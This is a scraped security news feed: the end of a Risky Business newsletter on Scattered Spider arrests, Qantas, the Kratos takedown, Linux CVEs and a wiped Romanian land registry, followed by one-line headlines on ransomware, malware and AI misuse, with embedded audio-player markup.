report</u></a> that year.&#xA0;</p><p><a href="https://cyberscoop.com/potent-youth-cybercrime-ring-made-up-of-1000-people-fbi-official-says/"><u>Reporting in 2024</u></a> described the group not so much as a discrete gang, but as an ecosystem or community that shares techniques and teaches juveniles to be effective hackers. Given that its members teamed up for particular projects, <a href="https://news.risky.biz/tiktok-manipulation-report-is-too-little-too-late/#scattered-spider-is-the-hollywood-of-cybercrime"><u>we likened it</u></a> to Hollywood as a collective, rather than a single production company.&#xA0;</p><p>In mid-2025, however, <a href="https://news.risky.biz/four-key-players-drive-scattered-spider/"><u>several security firms</u></a> said that a small number of key members were driving the activities of Scattered Spider, with different firms suggesting there were between two to four key players, who were essentially project managers. They selected targets and built a team of people from the broader group to carry out the attacks.&#xA0;</p><p>For key Scattered Spider members, elite social engineering skills appeared to be a key skill. Ransomware incident response firm Coveware <a href="https://www.coveware.com/blog/2023/10/27/scattered-ransomware-attribution-blurs-focus-on-ir-fundamentals"><u>wrote in 2023 that</u></a> &quot;skillful social engineering of the IT support desk to subvert, reset or overcome multi-factor authentication&quot; was a common tactic and that recordings confirmed that the same &quot;two or three&quot; individuals were consistently involved.&#xA0;&#xA0;</p><p>Although it has taken some time, these key individuals are now getting arrested. And it could just be because they have grown up.&#xA0;</p><p>In <a href="https://www.zetter-zeroday.com/tracking-peter-stokes-and-the-com-allison-nixon-and-her-work-unmasking-cybercriminals/"><u>an interview</u></a> with <em>Zero Day,</em> juvenile cybercrime expert Alison Nixon described why it is difficult to both deter and arrest young offenders involved with Scattered Spider&apos;s activities. Nixon says the FBI will not arrest juveniles because &quot;there is no federal juvenile system&quot;. It&apos;s only once they turn 18 and can be charged as an adult are suspects arrested. As for deterrence, Nixon says steering teenagers with no concept of the future onto the straight and narrow is difficult.</p><p>At this point, several influential members of Scattered Spider are aging out, have been arrested and some even sentenced to jail. We are hopeful that it will quiet the group, at least for a while.&#xA0;</p><p><em>Watch James Wilson and Tom Uren discuss this edition of the newsletter:</em></p><figure class="kg-card kg-embed-card"><iframe width="200" height="113" src="https://www.youtube.com/embed/z2X9DLJkBZ4?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen title="Srsly Risky Biz: Knives are out for open-weight AI models"></iframe></figure><h2 id="three-reasons-to-be-cheerful-this-week">Three Reasons to Be Cheerful This Week:</h2><ol><li><strong>Information Commissioner lets Qantas off the hook:</strong> The Office of the Australian information Commissioner <a href="https://www.oaic.gov.au/privacy/privacy-assessments-and-decisions/privacy-decisions/Investigation-inquiry-reports/report-into-preliminary-inquiries-of-qantas"><u>released its preliminary inquiry</u></a> into the June 2025 data breach at Australian airline Qantas. The OAIC doesn&apos;t plan to launch a full investigation because it thinks Qantas had taken &quot;reasonable&quot; steps to protect its data and had responded quickly to remediate the breach. The incident has all the hallmarks of a Scattered Spider attack, so the good news here is that it is possible to get owned by kids and yet somehow avoid the ire of the regulator.&#xA0;</li><li><strong>Kratos takedown:</strong> German and US authorities <a href="https://www.bka.de/DE/Presse/Listenseite_Pressemitteilungen/2026/Presse2026/260720_PM_Kratos.html"><u>have taken down</u></a> the <a href="https://any.run/cybersecurity-blog/kratos-phaas-account-takeover/"><u>Kratos phishing-as-a-service operation</u></a> and disrupted 200 servers. Its developer was also arrested by authorities in Indonesia.&#xA0;&#xA0;</li><li><strong><em>Krebs on Security</em> fixes LG TVs:</strong> LG has committed to ridding its webOS smart TV store of apps that turn a consumer&apos;s television into a residential proxy node. The promise came after <em>Krebs On Security</em> <a href="https://spur.us/blog/smart-tv-apps-residential-proxy-sdks"><u>highlighted research</u></a> that found 42% of webOS smart TV apps enrolled the devices into these networks. Residential proxies are often used for malicious purposes.&#xA0;&#xA0;&#xA0;&#xA0;</li></ol><h2 id="sponsor-section">Sponsor Section</h2><p><em>In this <strong>Risky Business sponsor interview</strong>, Casey Ellis chats with Haroon Meer from Thinkst about building companies customers don&#x2019;t hate. Haroon explains why Thinkst still offers Canary tokens for free and why it has avoided annual price hikes on its paid products. They talk about Eric Ries&#x2019;s &#x201C;Incorruptible&#x201D;, Rob Lee&#x2019;s 100-year-company approach at Dragos, and why keeping customers happy is a better business strategy than chasing easy sugar highs.</em></p> <!--kg-card-begin: html--> <iframe frameborder="0" style="width: 100%; height: 156px;" srcdoc=" &lt;!DOCTYPE html&gt; &lt;html&gt; &lt;head&gt; &lt;title&gt;Risky Business Player&lt;/title&gt; &lt;/head&gt; &lt;body&gt; &lt;!-- Include the Google Font Inter --&gt; &lt;style&gt; @import url(&quot;https://fonts.googleapis.com/css2?family=Inter:wght@400;700&amp;display=swap&quot;); body { margin: 0px; } .audio-player { font-family: &quot;Inter&quot;, sans-serif; } .icon { background-image: url(&quot;https://risky.biz/static/img/icons/subscribe-icons.svg&quot;); display: block; width: 33px; height: 33px; background-size: 528px 111px; } } &lt;/style&gt; &lt;!-- Audio player --&gt; &lt;div class=&quot;audio-player&quot; style=&quot;display: flex; flex-direction: column; gap: 5px; padding-top: 0px; padding-bottom: 20px; background: rgb(244, 244, 239); background: linear-gradient(0deg, rgba(244, 244, 239, 1) 0%, rgba(244, 244, 239, 0) 100%); border-radius: 8px; border: 1px solid #d7d7d7; width: calc(100% - 1px) min-width: 350px;&quot;&gt; &lt;audio class=&quot;audioElement&quot; preload=&quot;none&quot;&gt; &lt;source src=&quot;https://dts.podtrac.com/redirect.mp3/media3.risky.biz/RBNEWSSI136.mp3&quot; type=&quot;audio/mpeg&quot;&gt; Your browser does not support the audio element. &lt;/audio&gt; &lt;!-- Title --&gt; &lt;div style=&quot;background: #666666; color: #FEFEFE; font-size: 14px; padding-left: 5%; padding-right: 5%; padding-top: 10px; padding-bottom: 10px; border-top-left-radius: 8px; border-top-right-radius: 8px; white-space: nowrap; overflow: hidden; text-overflow: ellipsis; margin-bottom: 10px;&quot;&gt; &lt;a style=&quot;color:#FEFEFE; text-decoration: none;&quot; target=&quot;_new&quot; href=&quot;https://risky.biz/RBNEWSSI136/&quot;&gt;Sponsored: Thinkst on building companies that don&#x2019;t suck&lt;/a&gt; &lt;/div&gt; &lt;!-- Player Controls and Progress Bar --&gt; &lt;div style=&quot;display: flex; align-items: center; justify-content: center; gap: 10px; width: 90%; margin: 0 auto;&quot;&gt; &lt;button type=&quot;button&quot; class=&quot;playPauseBtn&quot; style=&quot;color: #1e1e1e; background-color: #FAFAFA; font-size: 18px; border: none; padding: 10px; border-radius: 8px; cursor: pointer; height: 42px; width: 42px; text-align: center; display: flex; align-items: center; justify-content: center;&quot;&gt;&amp;#9654;&lt;/button&gt; &lt;input type=&quot;range&quot; style=&quot;flex-grow: 1; -webkit-appearance: none; height: 5px; background: #ddd; border-radius: 8px; outline: none; cursor: pointer;&quot; class=&quot;progressBar&quot; value=&quot;0&quot; min=&quot;0&quot; max=&quot;100&quot; /&gt; &lt;span style=&quot;font-size: 12px; font-weight: 200;&quot; class=&quot;currentTime&quot;&gt;0:00&lt;/span&gt; / &lt;span style=&quot;font-size: 12px; font-weight: 200;&quot; class=&quot;duration&quot;&gt; 21:20 &lt;/span&gt; &lt;/div&gt; &lt;!-- Subscribe Buttons --&gt; &lt;div style=&quot;width: 90%; display: flex; justify-content: space-between; align-items: center; padding-left: 5%;&quot;&gt; &lt;div style=&quot;padding-right:20px;&quot; class=&quot;subText&quot;&gt; &lt;strong&gt;Subscribe &amp;nbsp;&lt;/strong&gt; &lt;/div&gt; &lt;div style=&quot;display: flex; align-items: center; gap: 6px; margin: 0; flex-grow: 1;&quot; class=&quot;subContainer&quot;&gt; &lt;a href=&quot;https://podcasts.apple.com/au/podcast/risky-business-news/id1621305970&quot; class=&quot;icon apple-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 48px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://overcast.fm/itunes1621305970&quot; class=&quot;icon overcast-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 141px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://pca.st/yicebxgl&quot; class=&quot;icon pocketcast-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 234px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://open.spotify.com/show/0BdExoUZqbGsBYjt6QZl4Q&quot; class=&quot;icon spotify-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 420px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://risky.biz/feeds/risky-business-news&quot; class=&quot;icon rss-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 327px 96px;&quot;&gt;&lt;/a&gt; &lt;/div&gt; &lt;a href=&quot;https://risky.biz&quot;&gt; &lt;img src=&quot;https://risky.biz/static/img/RB_Site_Logo.svg&quot; alt=&quot;Logo&quot; style=&quot;margin-left: 0; height: 32px; display: block; padding-right: 5%;&quot; id=&quot;logo&quot; class=&quot;logo playerLogo&quot;&gt; &lt;/a&gt; &lt;script&gt; document.addEventListener(&quot;DOMContentLoaded&quot;, function () { const players = document.querySelectorAll(&quot;.audio-player&quot;); function resizeElements(player) { const logo = player.querySelector(&quot;.logo&quot;); const subscribeIcons = player.querySelectorAll(&quot;.icon&quot;); const subscribeContainer = player.querySelector(&quot;.subContainer&quot;); // Select subContainer by class const subText = player.querySelector(&quot;.subText&quot;); // Select subText by class if (player.offsetWidth &lt;= 425) { // Hide logo if (logo) { logo.style.display = &quot;none&quot;; } } else if (player.offsetWidth &lt;= 500) { // Show logo and scale logo and icons to 70% if (logo) { logo.style.display = &quot;block&quot;; logo.style.transform = &quot;scale(0.7)&quot;; logo.style.transformOrigin = &quot;center&quot;; logo.style.verticalAlign = &quot;middle&quot;; } subscribeIcons.forEach(icon =&gt; { icon.style.transform = &quot;scale(0.7)&quot;; icon.style.transformOrigin = &quot;center&quot;; icon.style.verticalAlign = &quot;middle&quot;; }); // Remove padding from subText and set font-size to 12px if (subText) { subText.style.padding = &quot;0&quot;; subText.style.fontSize = &quot;12px&quot;; } // Set gap in subContainer to 0px if (subscribeContainer) { subscribeContainer.style.gap = &quot;0px&quot;; } } else { // Reset scaling, alignment, and visibility if (logo) { logo.style.display = &quot;block&quot;; logo.style.transform = &quot;scale(1)&quot;; logo.style.verticalAlign = &quot;baseline&quot;; } subscribeIcons.forEach(icon =&gt; { icon.style.transform = &quot;scale(1)&quot;; icon.style.verticalAlign = &quot;baseline&quot;; }); // Reset padding and font-size in subText if (subText) { subText.style.padding = &quot;0 20px&quot;; // Default padding subText.style.fontSize = &quot;inherit&quot;; // Default font-size } // Reset gap in subContainer if (subscribeContainer) { subscribeContainer.style.gap = &quot;6px&quot;; // Default gap } } } function handleResize() { players.forEach(player =&gt; { resizeElements(player); }); } // Run on initial load and resize handleResize(); window.addEventListener(&quot;resize&quot;, handleResize); }); &lt;/script&gt; &lt;/div&gt; &lt;/div&gt; &lt;script&gt; // Custom Audio Player document.addEventListener(&quot;DOMContentLoaded&quot;, function () { const players = document.querySelectorAll(&quot;.audio-player&quot;); players.forEach(function (player) { // Skip if already initialized if (player.dataset.initialized === &quot;true&quot;) return; // Mark player as initialized player.dataset.initialized = &quot;true&quot;; const audio = player.querySelector(&quot;.audioElement&quot;); const playPauseBtn = player.querySelector(&quot;.playPauseBtn&quot;); const progressBar = player.querySelector(&quot;.progressBar&quot;); const currentTimeEl = player.querySelector(&quot;.currentTime&quot;); const durationEl = player.querySelector(&quot;.duration&quot;); if (!audio || !playPauseBtn || !progressBar || !currentTimeEl || !durationEl) { console.error(&quot;One or more player elements not found:&quot;, { audio, playPauseBtn, progressBar, currentTimeEl, durationEl }); return; } playPauseBtn.addEventListener(&quot;click&quot;, () =&gt; { if (audio.paused) { audio.play(); playPauseBtn.textContent = &quot;&#x23F8;&quot;; // GA4 event for starting audio gtag(&quot;event&quot;, &quot;audio_play&quot;, { &quot;content_title&quot;: &quot;Sponsored: Thinkst on building companies that don&#x2019;t suck&quot;, &quot;content_type&quot;: &quot;audio&quot; }); } else { audio.pause(); playPauseBtn.textContent = &quot;&#x25B6;&quot;; } }); audio.addEventListener(&quot;timeupdate&quot;, () =&gt; { if (audio.duration) { progressBar.value = (audio.currentTime / audio.duration) * 100; currentTimeEl.textContent = formatTime(audio.currentTime); } }); audio.addEventListener(&quot;loadedmetadata&quot;, () =&gt; { durationEl.textContent = formatTime(audio.duration); }); progressBar.addEventListener(&quot;input&quot;, () =&gt; { if (audio.duration) { audio.currentTime = (progressBar.value / 100) * audio.duration; } }); function formatTime(seconds) { const minutes = Math.floor(seconds / 60); const secs = Math.floor(seconds % 60); return `${minutes}:${secs &lt; 10 ? &quot;0&quot; : &quot;&quot;}${secs}`; } }); }); &lt;/script&gt; &lt;/body&gt; &lt;/html&gt; "></iframe> <!--kg-card-end: html--> <h2 id="risky-biz-talks">Risky Biz Talks</h2><p><em>You can find the audio edition of this newsletter and other fine podcasts and interviews in the Risky Biz News feed (</em><a href="https://risky.biz/feeds/risky-business-news"><em><u>RSS</u></em></a><em>, </em><a href="https://podcasts.apple.com/au/podcast/risky-business-news/id1621305970"><em><u>iTunes</u></em></a><em> or </em><a href="https://open.spotify.com/show/0BdExoUZqbGsBYjt6QZl4Q"><em><u>Spotify</u></em></a><em>).&#xA0;&#xA0;</em></p><p><em>In our last &quot;Between Two Nerds&quot; discussion Tom Uren and </em><a href="https://twitter.com/thegrugq"><em><u>The Grugq</u></em></a><em> discuss just how important exploits are for cyber operations using data published in a new paper authored by two members of Ukraine&#x2019;s cyber security agency.</em></p> <!--kg-card-begin: html--> <iframe frameborder="0" style="width: 100%; height: 156px;" srcdoc=" &lt;!DOCTYPE html&gt; &lt;html&gt; &lt;head&gt; &lt;title&gt;Risky Business Player&lt;/title&gt; &lt;/head&gt; &lt;body&gt; &lt;!-- Include the Google Font Inter --&gt; &lt;style&gt; @import url(&quot;https://fonts.googleapis.com/css2?family=Inter:wght@400;700&amp;display=swap&quot;); body { margin: 0px; } .audio-player { font-family: &quot;Inter&quot;, sans-serif; } .icon { background-image: url(&quot;https://risky.biz/static/img/icons/subscribe-icons.svg&quot;); display: block; width: 33px; height: 33px; background-size: 528px 111px; } } &lt;/style&gt; &lt;!-- Audio player --&gt; &lt;div class=&quot;audio-player&quot; style=&quot;display: flex; flex-direction: column; gap: 5px; padding-top: 0px; padding-bottom: 20px; background: rgb(244, 244, 239); background: linear-gradient(0deg, rgba(244, 244, 239, 1) 0%, rgba(244, 244, 239, 0) 100%); border-radius: 8px; border: 1px solid #d7d7d7; width: calc(100% - 1px) min-width: 350px;&quot;&gt; &lt;audio class=&quot;audioElement&quot; preload=&quot;none&quot;&gt; &lt;source src=&quot;https://dts.podtrac.com/redirect.mp3/media3.risky.biz/BTN174.mp3&quot; type=&quot;audio/mpeg&quot;&gt; Your browser does not support the audio element. &lt;/audio&gt; &lt;!-- Title --&gt; &lt;div style=&quot;background: #666666; color: #FEFEFE; font-size: 14px; padding-left: 5%; padding-right: 5%; padding-top: 10px; padding-bottom: 10px; border-top-left-radius: 8px; border-top-right-radius: 8px; white-space: nowrap; overflow: hidden; text-overflow: ellipsis; margin-bottom: 10px;&quot;&gt; &lt;a style=&quot;color:#FEFEFE; text-decoration: none;&quot; target=&quot;_new&quot; href=&quot;https://risky.biz/BTN174/&quot;&gt;Between Two Nerds: Exploits are not cyber power&lt;/a&gt; &lt;/div&gt; &lt;!-- Player Controls and Progress Bar --&gt; &lt;div style=&quot;display: flex; align-items: center; justify-content: center; gap: 10px; width: 90%; margin: 0 auto;&quot;&gt; &lt;button type=&quot;button&quot; class=&quot;playPauseBtn&quot; style=&quot;color: #1e1e1e; background-color: #FAFAFA; font-size: 18px; border: none; padding: 10px; border-radius: 8px; cursor: pointer; height: 42px; width: 42px; text-align: center; display: flex; align-items: center; justify-content: center;&quot;&gt;&amp;#9654;&lt;/button&gt; &lt;input type=&quot;range&quot; style=&quot;flex-grow: 1; -webkit-appearance: none; height: 5px; background: #ddd; border-radius: 8px; outline: none; cursor: pointer;&quot; class=&quot;progressBar&quot; value=&quot;0&quot; min=&quot;0&quot; max=&quot;100&quot; /&gt; &lt;span style=&quot;font-size: 12px; font-weight: 200;&quot; class=&quot;currentTime&quot;&gt;0:00&lt;/span&gt; / &lt;span style=&quot;font-size: 12px; font-weight: 200;&quot; class=&quot;duration&quot;&gt; 30:08 &lt;/span&gt; &lt;/div&gt; &lt;!-- Subscribe Buttons --&gt; &lt;div style=&quot;width: 90%; display: flex; justify-content: space-between; align-items: center; padding-left: 5%;&quot;&gt; &lt;div style=&quot;padding-right:20px;&quot; class=&quot;subText&quot;&gt; &lt;strong&gt;Subscribe &amp;nbsp;&lt;/strong&gt; &lt;/div&gt; &lt;div style=&quot;display: flex; align-items: center; gap: 6px; margin: 0; flex-grow: 1;&quot; class=&quot;subContainer&quot;&gt; &lt;a href=&quot;https://podcasts.apple.com/au/podcast/risky-business-news/id1621305970&quot; class=&quot;icon apple-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 48px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://overcast.fm/itunes1621305970&quot; class=&quot;icon overcast-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 141px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://pca.st/yicebxgl&quot; class=&quot;icon pocketcast-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 234px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://open.spotify.com/show/0BdExoUZqbGsBYjt6QZl4Q&quot; class=&quot;icon spotify-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 420px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://risky.biz/feeds/risky-business-news&quot; class=&quot;icon rss-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 327px 96px;&quot;&gt;&lt;/a&gt; &lt;/div&gt; &lt;a href=&quot;https://risky.biz&quot;&gt; &lt;img src=&quot;https://risky.biz/static/img/RB_Site_Logo.svg&quot; alt=&quot;Logo&quot; style=&quot;margin-left: 0; height: 32px; display: block; padding-right: 5%;&quot; id=&quot;logo&quot; class=&quot;logo playerLogo&quot;&gt; &lt;/a&gt; &lt;script&gt; document.addEventListener(&quot;DOMContentLoaded&quot;, function () { const players = document.querySelectorAll(&quot;.audio-player&quot;); function resizeElements(player) { const logo = player.querySelector(&quot;.logo&quot;); const subscribeIcons = player.querySelectorAll(&quot;.icon&quot;); const subscribeContainer = player.querySelector(&quot;.subContainer&quot;); // Select subContainer by class const subText = player.querySelector(&quot;.subText&quot;); // Select subText by class if (player.offsetWidth &lt;= 425) { // Hide logo if (logo) { logo.style.display = &quot;none&quot;; } } else if (player.offsetWidth &lt;= 500) { // Show logo and scale logo and icons to 70% if (logo) { logo.style.display = &quot;block&quot;; logo.style.transform = &quot;scale(0.7)&quot;; logo.style.transformOrigin = &quot;center&quot;; logo.style.verticalAlign = &quot;middle&quot;; } subscribeIcons.forEach(icon =&gt; { icon.style.transform = &quot;scale(0.7)&quot;; icon.style.transformOrigin = &quot;center&quot;; icon.style.verticalAlign = &quot;middle&quot;; }); // Remove padding from subText and set font-size to 12px if (subText) { subText.style.padding = &quot;0&quot;; subText.style.fontSize = &quot;12px&quot;; } // Set gap in subContainer to 0px if (subscribeContainer) { subscribeContainer.style.gap = &quot;0px&quot;; } } else { // Reset scaling, alignment, and visibility if (logo) { logo.style.display = &quot;block&quot;; logo.style.transform = &quot;scale(1)&quot;; logo.style.verticalAlign = &quot;baseline&quot;; } subscribeIcons.forEach(icon =&gt; { icon.style.transform = &quot;scale(1)&quot;; icon.style.verticalAlign = &quot;baseline&quot;; }); // Reset padding and font-size in subText if (subText) { subText.style.padding = &quot;0 20px&quot;; // Default padding subText.style.fontSize = &quot;inherit&quot;; // Default font-size } // Reset gap in subContainer if (subscribeContainer) { subscribeContainer.style.gap = &quot;6px&quot;; // Default gap } } } function handleResize() { players.forEach(player =&gt; { resizeElements(player); }); } // Run on initial load and resize handleResize(); window.addEventListener(&quot;resize&quot;, handleResize); }); &lt;/script&gt; &lt;/div&gt; &lt;/div&gt; &lt;script&gt; // Custom Audio Player document.addEventListener(&quot;DOMContentLoaded&quot;, function () { const players = document.querySelectorAll(&quot;.audio-player&quot;); players.forEach(function (player) { // Skip if already initialized if (player.dataset.initialized === &quot;true&quot;) return; // Mark player as initialized player.dataset.initialized = &quot;true&quot;; const audio = player.querySelector(&quot;.audioElement&quot;); const playPauseBtn = player.querySelector(&quot;.playPauseBtn&quot;); const progressBar = player.querySelector(&quot;.progressBar&quot;); const currentTimeEl = player.querySelector(&quot;.currentTime&quot;); const durationEl = player.querySelector(&quot;.duration&quot;); if (!audio || !playPauseBtn || !progressBar || !currentTimeEl || !durationEl) { console.error(&quot;One or more player elements not found:&quot;, { audio, playPauseBtn, progressBar, currentTimeEl, durationEl }); return; } playPauseBtn.addEventListener(&quot;click&quot;, () =&gt; { if (audio.paused) { audio.play(); playPauseBtn.textContent = &quot;&#x23F8;&quot;; // GA4 event for starting audio gtag(&quot;event&quot;, &quot;audio_play&quot;, { &quot;content_title&quot;: &quot;Between Two Nerds: Exploits are not cyber power&quot;, &quot;content_type&quot;: &quot;audio&quot; }); } else { audio.pause(); playPauseBtn.textContent = &quot;&#x25B6;&quot;; } }); audio.addEventListener(&quot;timeupdate&quot;, () =&gt; { if (audio.duration) { progressBar.value = (audio.currentTime / audio.duration) * 100; currentTimeEl.textContent = formatTime(audio.currentTime); } }); audio.addEventListener(&quot;loadedmetadata&quot;, () =&gt; { durationEl.textContent = formatTime(audio.duration); }); progressBar.addEventListener(&quot;input&quot;, () =&gt; { if (audio.duration) { audio.currentTime = (progressBar.value / 100) * audio.duration; } }); function formatTime(seconds) { const minutes = Math.floor(seconds / 60); const secs = Math.floor(seconds % 60); return `${minutes}:${secs &lt; 10 ? &quot;0&quot; : &quot;&quot;}${secs}`; } }); }); &lt;/script&gt; &lt;/body&gt; &lt;/html&gt; "></iframe> <!--kg-card-end: html--> <p><em>Or watch it on YouTube!</em></p><figure class="kg-card kg-embed-card"><iframe width="200" height="113" src="https://www.youtube.com/embed/k6KALEsKpiA?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen title="Between Two Nerds: Exploits are not cyber power"></iframe></figure><h2 id="from-risky-bulletin">From <a href="https://news.risky.biz/tag/risky-bulletin/"><em><u>Risky Bulletin</u></em></a>:</h2><p><strong>Linux kernel discloses 442 CVEs as AI bugpocalypse settles in:</strong> The Linux kernel project has disclosed <a href="https://lore.kernel.org/linux-cve-announce/"><u>442 vulnerabilities</u></a> over the past three days, in a massive dumb of CVEs on its security mailing list.</p><p>Although not confirmed, the bugs were likely discovered using AI tools. Over the past months, projects like Anthropic&apos;s Glasswing and OpenAI&apos;s Daybreak have been granting access to advanced frontier cybersecurity models to top-tier security firms and researchers to find bugs with AI in major open-source projects.</p><p>[<a href="https://news.risky.biz/risky-bulletin-linux-kernel-discloses-442-cves-as-ai-bugpocalypse-settles-in/"><u>more</u></a> on <em>Risky Bulletin</em>]</p><p><strong>Hacker wipes Romania&apos;s entire land registry database: </strong>A hacker has breached Romania&apos;s cadastre agency and wiped the country&apos;s entire land registry database following a failed extortion attempt.</p><p>The hack has brought Romania&apos;s entire real-estate market to a <a href="https://jurnaluldearges.ro/notarita-ana-stan-sunt-in-co-fortat-hackerii-au-spart-cadastrul-458711/"><u>standstill</u></a> as official apps and websites have been offline for a week. Notaries can&apos;t record new transactions while citizens can&apos;t obtain proof of ownership or detailed land records.</p><p>Email servers at the National Agency for Cadastre and Real Estate Advertising (<em>Agen&#x21B;ia Na&#x21B;ional&#x103; de Cadastru &#x219;i Publicitate Imobiliar&#x103;</em>, or ANCPI) were also down as part of the incident.</p><p>Sources told Risky Business that the hacker entered using valid credentials, mapped internal systems, and wiped systems and backups after failing to extort the agency.</p><p>[<a href="https://news.risky.biz/risky-bulletin-hacker-wipes-romanias-entire-land-registry-database/"><u>more</u></a> on <em>Risky Bulletin</em>]</p>
  90. Brazilian Banking Trojan Actively Spreading in Portugal

    Thu, 23 Jul 2026 07:00:00 -0000

    Portuguese businesses operate in the same native language as Brazilian hackers, making those businesses easy targets.
  91. Ransomware Attack Puts a Chill on Japanese Frozen-Food Chain

    Thu, 23 Jul 2026 01:00:00 -0000

    A cyberattack on a food and logistics firm disrupts the supply of frozen food to thousands of clients, including major franchises like Kentucky Fried Chicken.
  92. Attackers Are Learning to Live Off the AI Toolchain

    Wed, 22 Jul 2026 21:29:01 -0000

    Sandworm_Mode is an early example of malware that exploits trusted AI tools and workflows to make malicious activity virtually indistinguishable from normal activity.
  93. Fake Bahrain Alert App Deploys Android Surveillance Malware

    Wed, 22 Jul 2026 19:42:42 -0000

    A malicious application delivers four-stage Android spyware via phony Google Play sites, exploiting civilian fear during Iranian missile strikes.
  94. When AI Attacks: OpenAI Models Autonomously Hack Hugging Face

    Wed, 22 Jul 2026 15:53:47 -0000

    Advanced LLMs escaped their sandboxes while attempting to achieve a non-malicious benchmark test objective.
  95. Ransomware Is Accelerating, but It's Not Because of AI

    Tue, 21 Jul 2026 21:48:05 -0000

    Researchers pointed to fragmentation of the ransomware ecosystem, the emergence of new attackers, and expansion of attacks on less defended organizations.
  96. Using LLMs to Find & Prioritize Vulnerabilities Is No Easy Task

    Tue, 21 Jul 2026 21:27:37 -0000

    The latest large language models have high false-positive rates and fail to take into account the context of scans, leading to more work for AppSec professionals.
  97. Hacker Turns AI Jailbreaks Into Offensive Attack Platform

    Tue, 21 Jul 2026 18:38:52 -0000

    A Russian-speaking actor, &quot;Trim,&quot; dismantled publicly available frontier models and integrated them with offensive security tools.
  98. Choose Wisely: AI-Generated Coding Risk Varies, a Lot

    Tue, 21 Jul 2026 13:00:00 -0000

    AI-generated code introduces 15 vulnerabilities on average per codebase, but the actual risk depends on framework pairing more than the model used.
  99. 'WP2Shell' Opens Millions of WordPress Sites to Remote Takeover

    Mon, 20 Jul 2026 21:38:18 -0000

    Barely three days after disclosure, attackers are widely chaining together CVE-2026-60137 and CVE-2026-63030 to lob exploit attempts against one of the largest attack surfaces on the Internet.
  100. Remediating Vulnerabilities With LLMs: Inside Ivanti's Automation Push

    Mon, 20 Jul 2026 20:26:56 -0000

    Ivanti CSO Daniel Spicer says frontier models have shown surprising effectiveness in early stages, but cost and human-in-the-loop viability remain open questions.
  101. Srsly Risky Biz: Ransomware Uses AI To Amp Up Negotiations

    Thu, 16 Jul 2026 07:32:27 -0000

    <p><em>Your weekly dose of Seriously Risky Business news is written by </em><a href="https://twitter.com/tomatospy"><em><u>Tom Uren</u></em></a><em> and edited by Amberleigh Jack. This week&apos;s edition is sponsored by </em><a href="https://www.sondera.ai"><em><u>Sondera</u></em></a><em>.</em></p><p><em>You can hear a podcast discussion of this newsletter by searching for &quot;Risky Business News&quot; in your podcatcher or subscribing via</em></p>
    <img src="https://storage.ghost.io/c/16/e9/16e9a748-ca66-4b3c-8590-85537131f696/content/images/2026/07/data-src-image-0106ab1d-8229-47e6-a23a-bb2d0635999b-1.jpeg" alt="Srsly Risky Biz: Ransomware Uses AI To Amp Up Negotiations"><p><em>Your weekly dose of Seriously Risky Business news is written by </em><a href="https://twitter.com/tomatospy"><em><u>Tom Uren</u></em></a><em> and edited by Amberleigh Jack. This week&apos;s edition is sponsored by </em><a href="https://www.sondera.ai"><em><u>Sondera</u></em></a><em>.</em></p><p><em>You can hear a podcast discussion of this newsletter by searching for &quot;Risky Business News&quot; in your podcatcher or subscribing via </em><a href="https://risky.biz/feeds/risky-business-news/"><em><u>this RSS feed</u></em></a><em>.</em></p> <!--kg-card-begin: html--> <iframe frameborder="0" style="width: 100%; height: 156px;" srcdoc=" &lt;!DOCTYPE html&gt; &lt;html&gt; &lt;head&gt; &lt;title&gt;Risky Business Player&lt;/title&gt; &lt;/head&gt; &lt;body&gt; &lt;!-- Include the Google Font Inter --&gt; &lt;style&gt; @import url(&quot;https://fonts.googleapis.com/css2?family=Inter:wght@400;700&amp;display=swap&quot;); body { margin: 0px; } .audio-player { font-family: &quot;Inter&quot;, sans-serif; } .icon { background-image: url(&quot;https://risky.biz/static/img/icons/subscribe-icons.svg&quot;); display: block; width: 33px; height: 33px; background-size: 528px 111px; } } &lt;/style&gt; &lt;!-- Audio player --&gt; &lt;div class=&quot;audio-player&quot; style=&quot;display: flex; flex-direction: column; gap: 5px; padding-top: 0px; padding-bottom: 20px; background: rgb(244, 244, 239); background: linear-gradient(0deg, rgba(244, 244, 239, 1) 0%, rgba(244, 244, 239, 0) 100%); border-radius: 8px; border: 1px solid #d7d7d7; width: calc(100% - 1px) min-width: 350px;&quot;&gt; &lt;audio class=&quot;audioElement&quot; preload=&quot;none&quot;&gt; &lt;source src=&quot;https://dts.podtrac.com/redirect.mp3/media3.risky.biz/SRB175.mp3&quot; type=&quot;audio/mpeg&quot;&gt; Your browser does not support the audio element. &lt;/audio&gt; &lt;!-- Title --&gt; &lt;div style=&quot;background: #666666; color: #FEFEFE; font-size: 14px; padding-left: 5%; padding-right: 5%; padding-top: 10px; padding-bottom: 10px; border-top-left-radius: 8px; border-top-right-radius: 8px; white-space: nowrap; overflow: hidden; text-overflow: ellipsis; margin-bottom: 10px;&quot;&gt; &lt;a style=&quot;color:#FEFEFE; text-decoration: none;&quot; target=&quot;_new&quot; href=&quot;https://risky.biz/SRB175/&quot;&gt;Srsly Risky Biz: Ransomware uses AI to amp up negotiations&lt;/a&gt; &lt;/div&gt; &lt;!-- Player Controls and Progress Bar --&gt; &lt;div style=&quot;display: flex; align-items: center; justify-content: center; gap: 10px; width: 